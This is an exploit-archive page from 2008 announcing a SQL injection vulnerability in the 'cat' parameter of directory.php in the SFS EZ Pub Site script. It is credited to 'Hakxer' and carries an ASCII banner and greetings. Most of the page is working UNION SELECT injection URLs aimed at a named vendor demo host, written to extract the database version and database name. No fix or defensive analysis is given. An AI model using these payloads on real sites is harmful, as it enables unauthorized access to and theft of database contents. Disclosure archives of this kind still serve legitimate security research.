[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SFS EZ Pub Site (directory.php cat) SQL Injection Vulnerability
# Published : 2008-11-01
# Author : Hakxer
# Previous Title : SFS EZ Webstore (where) Remote SQL Injection Vulnerability
# Next Title : SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability


###########################################################################
      ______    __  __   ______          __                ______                   
     / ____/___  / /  / ____/___  ____/ /__  __________ /_  __/__  ____ _____ ___ 
    / __/ / __ `/  /  / /   / __ / __  / _ / ___/ ___/  / / / _ / __ `/ __ `__ 
   / /___/ /_/ / / /  / /___/ /_/ / /_/ /  __/ /  (__  )  / / /  __/ /_/ / / / / / /
  /_____/__, / /_/   ____/____/__,_/___/_/  /____/  /_/  ___/__,_/_/ /_/ /_/ 
        /____/                                           

# Discovered by : Hakxer
# Type Gap : SQL Injection
# Script : 	SFS EZ Pub Site 
# Greetz : Allah , Egyptian x hacker , Str0ke  :) 
##########################################################################

# [~] Poc : 
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
# [~] Exploit :
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14/*
OR
http://www.turnkeyzone.com/demos/pubs/directory.php?cat=-9+union+select+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14/*
		

# Proud To be a Muslim #
#_=END=_#

# www.Syue.com [2008-11-01]